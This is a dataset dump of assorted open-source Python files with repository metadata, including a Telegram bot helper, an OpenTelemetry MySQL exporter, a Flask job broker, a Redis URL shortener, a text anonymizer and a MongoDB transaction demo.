33e8f24130e48b94bffd6cb5db000655f6d2dde5 | 3,106 | py | Python | src/messages/results/base.py | rkulyn/telegram-dutch-taxbot | f6c2222e5f2b9f96d8e035e9d6f64c67da3a73e1 | [
"MIT"
] | 2 | 2020-02-27T13:15:07.000Z | 2020-09-19T15:19:29.000Z | src/messages/results/base.py | rkulyn/telegram-dutch-taxbot | f6c2222e5f2b9f96d8e035e9d6f64c67da3a73e1 | [
"MIT"
] | null | null | null | src/messages/results/base.py | rkulyn/telegram-dutch-taxbot | f6c2222e5f2b9f96d8e035e9d6f64c67da3a73e1 | [
"MIT"
] | null | null | null | import abc
from collections import OrderedDict
from .constants import RESULT_KEY_MAP
class ResultMessageBase(abc.ABC):
"""
Result message base class.
"""
@abc.abstractmethod
def get_content(self, custom_data=None):
"""
Get message content.
Args:
custom_data (dict): Any custom data.
Returns:
(dict): Message content.
"""
return {}
def get_options(self):
"""
Get message options.
Returns:
(dict): Message options.
"""
return {}
@staticmethod
def convert_result_to_readable(result):
"""
Convert result keys to convenient format.
Args:
result (OrderedDict): Raw result data.
Returns:
(OrderedDict): Converted result data.
"""
converted = OrderedDict()
for key, value in result.items():
if key in RESULT_KEY_MAP:
converted[RESULT_KEY_MAP[key]] = value
return converted
class FileResultMessageBase(ResultMessageBase):
"""
Build and sent result as document message.
"""
@abc.abstractmethod
def get_filename(self):
"""
Define filename.
Returns:
(str): Filename.
"""
return "output"
@abc.abstractmethod
def get_document(self, data):
"""
Build document to send.
Args:
data (dict): Data to build document.
Returns:
(file-like object): Document.
"""
return None
def get_content(self, custom_data=None):
content = {
"filename": self.get_filename(),
"document": self.get_document(custom_data or {}),
}
content.update(self.get_options())
return content
def send(self, bot, chat_id, custom_data=None):
"""
Send built message.
Args:
bot (instance): Bot.
chat_id (int): Chat ID.
custom_data (dict): Any custom data.
Returns: None.
"""
bot.send_document(
chat_id=chat_id,
**self.get_content(custom_data)
)
class TextResultMessageBase(ResultMessageBase):
"""
Build and sent result as text message.
"""
@abc.abstractmethod
def get_text(self, data):
"""
Build text to send.
Args:
data (dict): Data to build text.
Returns:
(str): Text.
"""
return ""
def get_content(self, custom_data=None):
content = {"text": self.get_text(custom_data or {})}
content.update(self.get_options())
return content
def send(self, bot, chat_id, custom_data=None):
"""
Send built message.
Args:
bot (instance): Bot.
chat_id (int): Chat ID.
custom_data (dict): Any custom data.
Returns: None.
"""
bot.send_message(
chat_id=chat_id,
**self.get_content(custom_data)
)
| 20.168831 | 61 | 0.533162 | 3,010 | 0.969092 | 0 | 0 | 1,362 | 0.438506 | 0 | 0 | 1,466 | 0.47199 |
33ec942a5d39ab4de12cd3ad377092659ef39d3e | 377 | py | Python | extract_wn_synsets.py | napsternxg/WordNetExperiments | 6dd12604b3b1ae64d07b819745629074b9db993b | [
"Apache-2.0"
] | 2 | 2017-06-22T16:59:58.000Z | 2020-03-26T17:04:32.000Z | extract_wn_synsets.py | napsternxg/WordNetExperiments | 6dd12604b3b1ae64d07b819745629074b9db993b | [
"Apache-2.0"
] | null | null | null | extract_wn_synsets.py | napsternxg/WordNetExperiments | 6dd12604b3b1ae64d07b819745629074b9db993b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from nltk.corpus import wordnet as wn
all_synsets = set()
for word in wn.words():
for synset in wn.synsets(word):
all_synsets.add(synset)
with open("wordnet_synset_definition.txt", "wb+") as fp:
for synset in all_synsets:
print >> fp, "%s\t%s" % (
synset.name(),
synset.definition()
)
| 22.176471 | 56 | 0.570292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 59 | 0.156499 |
33ed53521c15ad28a778f2b1528538b64f181026 | 32 | py | Python | week01/test_f.py | wasit7/cn350 | a84a6ed04ada532e0a12c69d705cf3c15d7e0240 | [
"MIT"
] | null | null | null | week01/test_f.py | wasit7/cn350 | a84a6ed04ada532e0a12c69d705cf3c15d7e0240 | [
"MIT"
] | null | null | null | week01/test_f.py | wasit7/cn350 | a84a6ed04ada532e0a12c69d705cf3c15d7e0240 | [
"MIT"
] | null | null | null | n=1
def f(x):
print(n)
f(0) | 6.4 | 12 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33eef624cce407f1578fbc591f6a8b24eb12d230 | 2,047 | py | Python | otel_billing/otel_billing.py | rnishtala/otel_billing | 24f49458eb273d210f15c597953bd176a32f5e89 | [
"MIT"
] | null | null | null | otel_billing/otel_billing.py | rnishtala/otel_billing | 24f49458eb273d210f15c597953bd176a32f5e89 | [
"MIT"
] | null | null | null | otel_billing/otel_billing.py | rnishtala/otel_billing | 24f49458eb273d210f15c597953bd176a32f5e89 | [
"MIT"
] | null | null | null | """Main module."""
from sqlalchemy import create_engine
import pandas as pd
import collections
import logging
import re
from pprint import pprint
from typing import Sequence
from opentelemetry.metrics import Counter, Metric
from opentelemetry.sdk.metrics.export import (
MetricRecord,
MetricsExporter,
MetricsExportResult,
)
logger = logging.getLogger(__name__)
class FeatureMetricsExporter(MetricsExporter):
"""
Feature Usage metrics exporter for OpenTelemetry
"""
def __init__(self):
"""
Connect to the database
"""
eng_str = 'mysql+mysqldb://{0}:{1}@{2}:7706/{3}'.format('***',
'***',
'10.2.1.43',
'subscriber_data')
self.engine = create_engine(eng_str, pool_recycle=60, echo=True)
def export(
self, metric_records: Sequence[MetricRecord]
) -> MetricsExportResult:
for record in metric_records:
print(
'{}(feature_id="{}", performance_id="{}", value={})'.format(
type(self).__name__,
record.labels[0][1],
record.labels[1][1],
record.aggregator.checkpoint,
)
)
df = pd.DataFrame({"feature_id":int(record.labels[0][1]),
"performance_id":int(record.labels[1][1]),
"data":record.aggregator.checkpoint}, index=["feature_id"])
try:
df.to_sql(con=self.engine, name='feature_perf_data',
if_exists="append", index=False)
except ValueError as e:
print(e)
return MetricsExportResult.FAILURE
return MetricsExportResult.SUCCESS
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
| 33.016129 | 90 | 0.521739 | 1,668 | 0.814851 | 0 | 0 | 0 | 0 | 0 | 0 | 411 | 0.200782 |
33f0d31e3a217367f0357c35df26fe4ef6403f03 | 4,410 | py | Python | broker/service/api/v10.py | bigsea-ufcg/bigsea-manager | 73235298308f55ae287a595fc1f056fbcc022b12 | [
"Apache-2.0"
] | 3 | 2017-03-21T20:03:53.000Z | 2018-05-03T16:27:32.000Z | broker/service/api/v10.py | bigsea-ufcg/bigsea-manager | 73235298308f55ae287a595fc1f056fbcc022b12 | [
"Apache-2.0"
] | 7 | 2017-07-17T10:34:34.000Z | 2018-05-16T14:04:57.000Z | broker/service/api/v10.py | bigsea-ufcg/bigsea-manager | 73235298308f55ae287a595fc1f056fbcc022b12 | [
"Apache-2.0"
] | 10 | 2017-04-17T14:30:27.000Z | 2018-09-04T14:55:11.000Z | # Copyright (c) 2017 UFCG-LSD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from broker.plugins import base as plugin_base
from broker.service import api
from broker.utils.logger import Log
from broker.utils.framework import authorizer
from broker.utils.framework import optimizer
from broker import exceptions as ex
API_LOG = Log("APIv10", "logs/APIv10.log")
submissions = {}
def run_submission(data):
if ('plugin' not in data or 'plugin_info' not in data):
API_LOG.log("Missing plugin fields in request")
raise ex.BadRequestException("Missing plugin fields in request")
if data['enable_auth']:
if ('username' not in data or 'password' not in data):
API_LOG.log("Missing plugin fields in request")
raise ex.BadRequestException("Missing plugin fields in request")
username = data['username']
password = data['password']
authorization = authorizer.get_authorization(api.authorization_url,
username, password)
if not authorization['success']:
API_LOG.log("Unauthorized request")
raise ex.UnauthorizedException()
else:
if data['plugin'] not in api.plugins: raise ex.BadRequestException()
plugin = plugin_base.PLUGINS.get_plugin(data['plugin'])
submission_id, executor = plugin.execute(data['plugin_info'])
submissions[submission_id] = executor
return submission_id
def stop_submission(submission_id, data):
if 'username' not in data or 'password' not in data:
API_LOG.log("Missing parameters in request")
raise ex.BadRequestException()
username = data['username']
password = data['password']
authorization = authorizer.get_authorization(api.authorization_url,
username, password)
if not authorization['success']:
API_LOG.log("Unauthorized request")
raise ex.UnauthorizedException()
else:
if submission_id not in submissions.keys():
raise ex.BadRequestException()
# TODO: Call the executor by submission_id and stop the execution.
return submissions[submission_id]
def list_submissions():
submissions_status = {}
for id in submissions.keys():
this_status = {}
submissions_status[id] = this_status
this_status['status'] = (submissions[id].
get_application_state())
return submissions_status
def submission_status(submission_id):
if submission_id not in submissions.keys():
API_LOG.log("Wrong request")
raise ex.BadRequestException()
# TODO: Update status of application with more informations
this_status = {}
this_status['status'] = (submissions[submission_id].
get_application_state())
this_status['execution_time'] = (submissions[submission_id].
get_application_execution_time())
this_status['start_time'] = (submissions[submission_id].
get_application_start_time())
return this_status
def submission_log(submission_id):
if submission_id not in submissions.keys():
API_LOG.log("Wrong request")
raise ex.BadRequestException()
logs = {'execution':'', 'stderr':'', 'stdout': ''}
exec_log = open("logs/apps/%s/execution" % submission_id, "r")
stderr = open("logs/apps/%s/stderr" % submission_id, "r")
stdout = open("logs/apps/%s/stdout" % submission_id, "r")
remove_newline = lambda x: x.replace("\n","")
logs['execution'] = map(remove_newline, exec_log.readlines())
logs['stderr'] = map(remove_newline, stderr.readlines())
logs['stdout'] = map(remove_newline, stdout.readlines())
exec_log.close()
stderr.close()
stdout.close()
return logs
| 32.189781 | 76 | 0.65941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,301 | 0.295011 |
33f1df7af6076d426dfa10cdaf7eb926cc35605b | 362 | py | Python | Unit_B/chapter10_Lists/sampleCode/makeList.py | noynaert/csc184Handouts | c3e4c8824ee8d16b128abd771a8b5f8a2f01c0de | [
"Unlicense"
] | 2 | 2021-04-27T09:18:46.000Z | 2021-10-17T03:58:53.000Z | Unit_B/chapter10_Lists/sampleCode/makeList.py | noynaert/csc184Handouts | c3e4c8824ee8d16b128abd771a8b5f8a2f01c0de | [
"Unlicense"
] | null | null | null | Unit_B/chapter10_Lists/sampleCode/makeList.py | noynaert/csc184Handouts | c3e4c8824ee8d16b128abd771a8b5f8a2f01c0de | [
"Unlicense"
] | null | null | null | # creates a list and prints it
days = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
# traversing without an index
for day in days:
print(day)
# traversing with an index
for i in range(len(days)):
print(f"Day {i} is {days[i]}")
days[1] = "Lunes"
print("Day[1] is now ",days[1])
for day in days:
print(day) | 21.294118 | 85 | 0.624309 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 195 | 0.538674 |
33f2c47794c2f14e6aec70a212195a2870d2f836 | 826 | py | Python | cellacdc/models/YeaZ/__init__.py | SchmollerLab/Cell_ACDC | 2be9c0055c3306c4c35da99831f146d8a211baa0 | [
"BSD-3-Clause"
] | 29 | 2021-10-01T09:43:26.000Z | 2022-03-15T10:46:53.000Z | cellacdc/models/YeaZ/__init__.py | SchmollerLab/Cell_ACDC | 2be9c0055c3306c4c35da99831f146d8a211baa0 | [
"BSD-3-Clause"
] | 15 | 2022-02-04T09:21:43.000Z | 2022-03-31T08:29:00.000Z | cellacdc/models/YeaZ/__init__.py | SchmollerLab/Cell_ACDC | 2be9c0055c3306c4c35da99831f146d8a211baa0 | [
"BSD-3-Clause"
] | 1 | 2022-03-15T02:23:02.000Z | 2022-03-15T02:23:02.000Z | try:
import tensorflow
except ModuleNotFoundError:
pkg_name = 'tensorflow'
import os
import sys
import subprocess
from cellacdc import myutils
cancel = myutils.install_package_msg(pkg_name)
if cancel:
raise ModuleNotFoundError(
f'User aborted {pkg_name} installation'
)
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install', 'tensorflow']
)
# numba requires numpy<1.22 but tensorflow might install higher
# so install numpy less than 1.22 if needed
import numpy
np_version = numpy.__version__.split('.')
np_major, np_minor = [int(v) for v in np_version][:2]
if np_major >= 1 and np_minor >= 22:
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install', '--upgrade', 'numpy<1.22']
)
| 30.592593 | 79 | 0.635593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.279661 |
33f36e64be2e93d23e86bda79bdc0f169b48316e | 1,290 | py | Python | demos/shortify/shortify/utils.py | Ixyk-Wolf/aiohttp-demos | e26ef202e6fd4759f4c77f44cdbdbec482196b41 | [
"Apache-2.0"
] | 649 | 2017-10-27T10:55:59.000Z | 2022-03-29T07:14:09.000Z | demos/shortify/shortify/utils.py | xiaohuanshu/aiohttp-demos | 0d9898eec7e262ed0083159613de5d1ea1e98974 | [
"Apache-2.0"
] | 87 | 2017-10-27T11:12:06.000Z | 2021-08-17T18:36:59.000Z | demos/shortify/shortify/utils.py | xiaohuanshu/aiohttp-demos | 0d9898eec7e262ed0083159613de5d1ea1e98974 | [
"Apache-2.0"
] | 284 | 2017-11-05T13:24:51.000Z | 2022-03-12T03:37:55.000Z | import aioredis
import trafaret as t
import yaml
from aiohttp import web
CONFIG_TRAFARET = t.Dict(
{
t.Key('redis'): t.Dict(
{
'port': t.Int(),
'host': t.String(),
'db': t.Int(),
'minsize': t.Int(),
'maxsize': t.Int(),
}
),
'host': t.IP,
'port': t.Int(),
}
)
def load_config(fname):
with open(fname, 'rt') as f:
data = yaml.load(f)
return CONFIG_TRAFARET.check(data)
async def init_redis(conf, loop):
pool = await aioredis.create_redis_pool(
(conf['host'], conf['port']),
minsize=conf['minsize'],
maxsize=conf['maxsize'],
loop=loop,
)
return pool
CHARS = "abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789"
def encode(num, alphabet=CHARS):
if num == 0:
return alphabet[0]
arr = []
base = len(alphabet)
while num:
num, rem = divmod(num, base)
arr.append(alphabet[rem])
arr.reverse()
return ''.join(arr)
ShortifyRequest = t.Dict({t.Key('url'): t.URL})
def fetch_url(data):
try:
data = ShortifyRequest(data)
except t.DataError:
raise web.HTTPBadRequest('URL is not valid')
return data['url']
| 20.15625 | 66 | 0.54186 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.172868 | 175 | 0.135659 |
33f382e01faf075b62dec4b248210e8307fb81c2 | 1,667 | py | Python | anonymizers/location_anonymizer.py | zacharywilkins/anonymizac | c38ce30413f89f49b8e90cdca13c3739674d7b64 | [
"MIT"
] | null | null | null | anonymizers/location_anonymizer.py | zacharywilkins/anonymizac | c38ce30413f89f49b8e90cdca13c3739674d7b64 | [
"MIT"
] | null | null | null | anonymizers/location_anonymizer.py | zacharywilkins/anonymizac | c38ce30413f89f49b8e90cdca13c3739674d7b64 | [
"MIT"
] | null | null | null | from anonymizers.base_anonymizer import Anonymizer
class LocationAnonymizer(Anonymizer):
anonymization_type = "location"
location_prepositions = ["in", "at"]
def __init__(self):
self.initialize_spacy_model()
def is_location(self, index: int) -> bool:
if self.parsed_user_input[index - 1][0].lower() in self.location_prepositions:
return True
else:
return False
def scrub(self, user_input: str) -> str:
self.parsed_user_input = self.parse_user_input(user_input)
if 'PROPN' not in self.all_pos:
return user_input # For improved speed of implementation
anonymized_user_input_list = []
for index, parsed_word in enumerate(self.parsed_user_input):
word_text = parsed_word[0]
word_pos = parsed_word[1]
if index != 0 and word_pos == 'PROPN':
previous_word = self.parsed_user_input[index - 1]
if previous_word[2] == 'prep' or prev_word_anonymized:
if self.is_location(index) or (self.is_location(index - 1) and prev_word_anonymized):
anonymized_word = "[" + self.anonymization_type.upper() + "]"
anonymized_user_input_list.append(anonymized_word)
prev_word_anonymized = True
continue
anonymized_user_input_list.append(word_text)
prev_word_anonymized = False
anonymized_user_input = " ".join(anonymized_user_input_list)
anonymized_user_input = self.normalize_user_input(anonymized_user_input)
return anonymized_user_input | 38.767442 | 105 | 0.636473 | 1,614 | 0.968206 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.05099 |
33f77890d77ebb7d721abd90ddbfe421eb63ecdb | 5,838 | py | Python | Chapter05/python/init_data.py | iamssxn/PacktPublishingb | caadbf997f7f7a27601424b602fc554e7be931d4 | [
"MIT"
] | 18 | 2019-06-11T13:35:26.000Z | 2021-08-30T22:28:32.000Z | Chapter05/python/init_data.py | iamssxn/PacktPublishingb | caadbf997f7f7a27601424b602fc554e7be931d4 | [
"MIT"
] | 1 | 2019-10-10T12:27:44.000Z | 2019-10-10T12:27:44.000Z | Chapter05/python/init_data.py | iamssxn/PacktPublishingb | caadbf997f7f7a27601424b602fc554e7be931d4 | [
"MIT"
] | 8 | 2019-07-24T03:25:18.000Z | 2021-12-10T07:02:38.000Z | from pymongo import MongoClient
import json
class InitData:
def __init__(self):
self.client = MongoClient('localhost', 27017, w='majority')
self.db = self.client.mongo_bank
self.accounts = self.db.accounts
# drop data from accounts collection every time to start from a clean slate
self.db.drop_collection('accounts')
init_data = InitData.load_data(self)
self.insert_data(init_data)
#alex=100, mary=50
self.tx_transfer_err('1', '2', 300)
# alex=100, mary=50
self.tx_transfer_err('1', '2', 90)
# alex=10, mary=140
# alex=70, mary=80
# self.tx_transfer_err('2', '1', 20)
# alex=90, mary=60
# self.tx_transfer_err_ses('2', '1', 200)
@staticmethod
def load_data(self):
ret = []
with open('init_data.json', 'r') as f:
for line in f:
ret.append(json.loads(line))
return ret
def insert_data(self, data):
for document in data:
# breakpoint()
collection_name = document['collection']
account_id = document['account_id']
account_name = document['account_name']
account_balance = document['account_balance']
self.db[collection_name].insert_one({'account_id': account_id, 'name': account_name, 'balance': account_balance})
# we are updating outside of a tx
def transfer(self, source_account, target_account, value):
print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
with self.client.start_session() as ses:
ses.start_transaction()
self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value*(-1)} })
self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value} })
updated_source_balance = self.accounts.find_one({'account_id': source_account})['balance']
updated_target_balance = self.accounts.find_one({'account_id': target_account})['balance']
if updated_source_balance < 0 or updated_target_balance < 0:
ses.abort_transaction()
else:
ses.commit_transaction()
# transfer using a tx
def tx_transfer(self, source_account, target_account, value):
print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
with self.client.start_session() as ses:
ses.start_transaction()
self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value*(-1)} }, session=ses)
self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value} }, session=ses)
ses.commit_transaction()
# validating errors, not using the tx session
def tx_transfer_err(self, source_account, target_account, value):
print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
with self.client.start_session() as ses:
ses.start_transaction()
res = self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value*(-1)} }, session=ses)
res2 = self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value} }, session=ses)
error_tx = self.__validate_transfer(source_account, target_account)
if error_tx['status'] == True:
print(f"cant transfer {value} Hypnotons from {source_account} ({error_tx['s_bal']}) to {target_account} ({error_tx['t_bal']})")
ses.abort_transaction()
else:
ses.commit_transaction()
# validating errors, using the tx session
def tx_transfer_err_ses(self, source_account, target_account, value):
print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
with self.client.start_session() as ses:
ses.start_transaction()
res = self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value * (-1)}},
session=ses)
res2 = self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value}},
session=ses)
error_tx = self.__validate_transfer_ses(source_account, target_account, ses)
if error_tx['status'] == True:
print(f"cant transfer {value} Hypnotons from {source_account} ({error_tx['s_bal']}) to {target_account} ({error_tx['t_bal']})")
ses.abort_transaction()
else:
ses.commit_transaction()
# we are outside the transaction so we cant see the updated values
def __validate_transfer(self, source_account, target_account):
source_balance = self.accounts.find_one({'account_id': source_account})['balance']
target_balance = self.accounts.find_one({'account_id': target_account})['balance']
if source_balance < 0 or target_balance < 0:
return {'status': True, 's_bal': source_balance, 't_bal': target_balance}
else:
return {'status': False}
# we are passing the session value so that we can view the updated values
def __validate_transfer_ses(self, source_account, target_account, ses):
source_balance = self.accounts.find_one({'account_id': source_account}, session=ses)['balance']
target_balance = self.accounts.find_one({'account_id': target_account}, session=ses)['balance']
if source_balance < 0 or target_balance < 0:
return {'status': True, 's_bal': source_balance, 't_bal': target_balance}
else:
return {'status': False}
def main():
InitData()
if __name__ == '__main__':
main() | 46.704 | 143 | 0.626242 | 5,726 | 0.980815 | 0 | 0 | 193 | 0.033059 | 0 | 0 | 1,649 | 0.28246 |
33f795c2e3982a688bb7022c730690391c8e4132 | 532 | py | Python | 067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 9247b56a7dff37f28a8a7822a7ef4dd9adf7234d | [
"MIT"
] | 1,529 | 2019-12-11T13:36:23.000Z | 2022-03-31T18:38:27.000Z | 067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 9247b56a7dff37f28a8a7822a7ef4dd9adf7234d | [
"MIT"
] | 200 | 2020-01-06T09:24:42.000Z | 2022-03-31T17:29:08.000Z | 067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 9247b56a7dff37f28a8a7822a7ef4dd9adf7234d | [
"MIT"
] | 288 | 2020-02-21T14:56:02.000Z | 2022-03-30T03:00:35.000Z | ### tensorflow==2.3.1
import tensorflow as tf
# Float16 Quantization - Input/Output=float32
height = 384
width = 384
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model')
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_model = converter.convert()
with open('midas_{}x{}_float16_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Float16 Quantization complete! - midas_{}x{}_float16_quant.tflite'.format(height, width))
| 35.466667 | 96 | 0.770677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.345865 |
33f7daec8520bf61c9a9ff557667fd5b5759236d | 2,598 | py | Python | experiments/e2_multi_directional_model_comparison/file_naming/rules/single_target_tree_rule_naming.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 3 | 2020-08-03T19:25:44.000Z | 2021-06-27T22:25:55.000Z | experiments/e2_multi_directional_model_comparison/file_naming/rules/single_target_tree_rule_naming.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | null | null | null | experiments/e2_multi_directional_model_comparison/file_naming/rules/single_target_tree_rule_naming.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 2 | 2020-08-07T22:54:28.000Z | 2021-02-18T06:11:01.000Z | import os
from experiments.file_naming.single_target_classifier_indicator import SingleTargetClassifierIndicator
from project_info import project_dir
def get_single_target_tree_rule_dir() -> str:
mcars_dir: str = os.path.join(project_dir,
'models',
'single_target_tree_rules')
if not os.path.exists(mcars_dir):
os.makedirs(mcars_dir)
return mcars_dir
def get_single_target_tree_rules_relative_file_name_without_extension(
dataset_name: str, fold_i: int,
target_attribute: str,
classifier_indicator: SingleTargetClassifierIndicator,
nb_of_trees_per_model: int,
min_support: float,
max_depth: int
) -> str:
return (
f"{dataset_name}{fold_i}_{target_attribute}_{str(classifier_indicator.value)}"
f"_{nb_of_trees_per_model}trees"
f"_{min_support}supp_{max_depth}depth"
)
def get_single_target_tree_rules_abs_file_name(
dataset_name: str, fold_i: int,
target_attribute: str,
classifier_indicator: SingleTargetClassifierIndicator,
nb_of_trees_per_model: int,
min_support: float,
max_depth: int,
):
rules_dir = get_single_target_tree_rule_dir()
relative_file_name: str = get_single_target_tree_rules_relative_file_name_without_extension(
dataset_name=dataset_name, fold_i=fold_i,
target_attribute=target_attribute,
classifier_indicator=classifier_indicator,
nb_of_trees_per_model=nb_of_trees_per_model,
min_support=min_support, max_depth=max_depth
)
tree_derived_rule_abs_file_name = os.path.join(rules_dir, f"{relative_file_name}.json.gz")
return tree_derived_rule_abs_file_name
def get_single_target_tree_rules_gen_timing_info_abs_file_name(
dataset_name: str, fold_i: int,
target_attribute: str,
classifier_indicator: SingleTargetClassifierIndicator,
nb_of_trees_per_model: int,
min_support: float,
max_depth: int,
):
rules_dir = get_single_target_tree_rule_dir()
relative_file_name: str = get_single_target_tree_rules_relative_file_name_without_extension(
dataset_name=dataset_name, fold_i=fold_i,
target_attribute=target_attribute,
classifier_indicator=classifier_indicator,
nb_of_trees_per_model=nb_of_trees_per_model,
min_support=min_support, max_depth=max_depth
)
tree_derived_rule_abs_file_name = os.path.join(rules_dir, f"{relative_file_name}_timings.json.gz")
return tree_derived_rule_abs_file_name
| 36.591549 | 102 | 0.734411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 252 | 0.096998 |
33f87e0f533a0c640931bd3fd8c3d5fa7efb74b8 | 1,291 | py | Python | devconf/ast/mixins/expression.py | everclear72216/ucapi | 7f5afbee6b3b772086d33c2ee37e85e65af61697 | [
"MIT"
] | null | null | null | devconf/ast/mixins/expression.py | everclear72216/ucapi | 7f5afbee6b3b772086d33c2ee37e85e65af61697 | [
"MIT"
] | 5 | 2019-03-04T16:17:30.000Z | 2019-05-04T08:34:19.000Z | devconf/ast/mixins/expression.py | everclear72216/ucapi | 7f5afbee6b3b772086d33c2ee37e85e65af61697 | [
"MIT"
] | null | null | null | import ast.value
import ast.qualifier
import ast.mixins.node
import ast.mixins.typed
import ast.mixins.qualified
class LValueExpression(ast.mixins.node.Node, ast.mixins.typed.Typed, ast.mixins.qualified.Qualified):
def __init__(self):
super().__init__()
self.__value: ast.value.Value or None = None
def get_value(self) -> ast.value.Value:
assert isinstance(self.__value, ast.value.Value) or self.has_default()
if self.__value is None:
assert self.has_default()
value = self.get_default()
assert isinstance(value, ast.value.Value)
return value
else:
assert isinstance(self.__value, ast.value.Value)
return self.__value
def set_value(self, value: ast.value.Value) -> None:
assert isinstance(value, ast.value.Value)
if hasattr(super(), 'set_value'):
super().set_value(value)
self.__value = value
def has_default(self) -> bool:
return False
def get_default(self) -> ast.value.Value or None:
return None
def evaluate(self):
pass
class RValueExpression(LValueExpression):
def __init__(self):
super().__init__()
self.add_qualifier(ast.qualifier.ConstQualifier())
| 23.907407 | 101 | 0.642912 | 1,171 | 0.907049 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | 0.008521 |
33f916f81fdbf9453883ef52533bcab168ba5c0e | 911 | py | Python | todo/mail/delivery.py | sweetlearn/django-todo | 70cac8b4e926794126f831a766a1461fa5eae399 | [
"BSD-3-Clause"
] | 1 | 2019-03-23T08:53:53.000Z | 2019-03-23T08:53:53.000Z | todo/mail/delivery.py | sweetlearn/django-todo | 70cac8b4e926794126f831a766a1461fa5eae399 | [
"BSD-3-Clause"
] | null | null | null | todo/mail/delivery.py | sweetlearn/django-todo | 70cac8b4e926794126f831a766a1461fa5eae399 | [
"BSD-3-Clause"
] | null | null | null | import importlib
def _declare_backend(backend_path):
backend_path = backend_path.split('.')
backend_module_name = '.'.join(backend_path[:-1])
class_name = backend_path[-1]
def backend(*args, headers={}, from_address=None, **kwargs):
def _backend():
backend_module = importlib.import_module(backend_module_name)
backend = getattr(backend_module, class_name)
return backend(*args, **kwargs)
if from_address is None:
raise ValueError("missing from_address")
_backend.from_address = from_address
_backend.headers = headers
return _backend
return backend
smtp_backend = _declare_backend('django.core.mail.backends.smtp.EmailBackend')
console_backend = _declare_backend('django.core.mail.backends.console.EmailBackend')
locmem_backend = _declare_backend('django.core.mail.backends.locmem.EmailBackend')
| 35.038462 | 84 | 0.710209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 168 | 0.184413 |
33f92dee740cb042eaee2c3fec74d44c25ed57fb | 795 | py | Python | models.py | 12DReflections/cab_trips | fc85ebd44056b1a340705164912d2f8c700415df | [
"BSD-Source-Code"
] | null | null | null | models.py | 12DReflections/cab_trips | fc85ebd44056b1a340705164912d2f8c700415df | [
"BSD-Source-Code"
] | null | null | null | models.py | 12DReflections/cab_trips | fc85ebd44056b1a340705164912d2f8c700415df | [
"BSD-Source-Code"
] | null | null | null | from database import Base
from sqlalchemy import Column, Integer, String, Boolean, ForeignKey, DateTime, Float
from sqlalchemy.types import DateTime
from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Medallions(Base):
__tablename__ = 'medallions'
id = Column(Integer, primary_key=True)
medallion = Column(String(50))
hack_license = Column(String(20))
vendor_id = Column(String(20))
rate_code = Column(String(20))
store_and_fwd_flag = Column(String(20))
pickup_datetime = Column(DateTime)
dropoff_datetime = Column(DateTime)
passenger_count = Column(Integer)
trip_time_in_secs = Column(Integer)
trip_distance = Column(Float)
| 25.645161 | 84 | 0.78239 | 444 | 0.558491 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.055346 |
33f98f80566e3cf8e0e71b7f6386a2651df6888b | 4,131 | py | Python | census_api/census_query.py | chrispyles/census_api | bb543517e4226a075b28cc3d10f7a40403f79337 | [
"BSD-3-Clause"
] | null | null | null | census_api/census_query.py | chrispyles/census_api | bb543517e4226a075b28cc3d10f7a40403f79337 | [
"BSD-3-Clause"
] | null | null | null | census_api/census_query.py | chrispyles/census_api | bb543517e4226a075b28cc3d10f7a40403f79337 | [
"BSD-3-Clause"
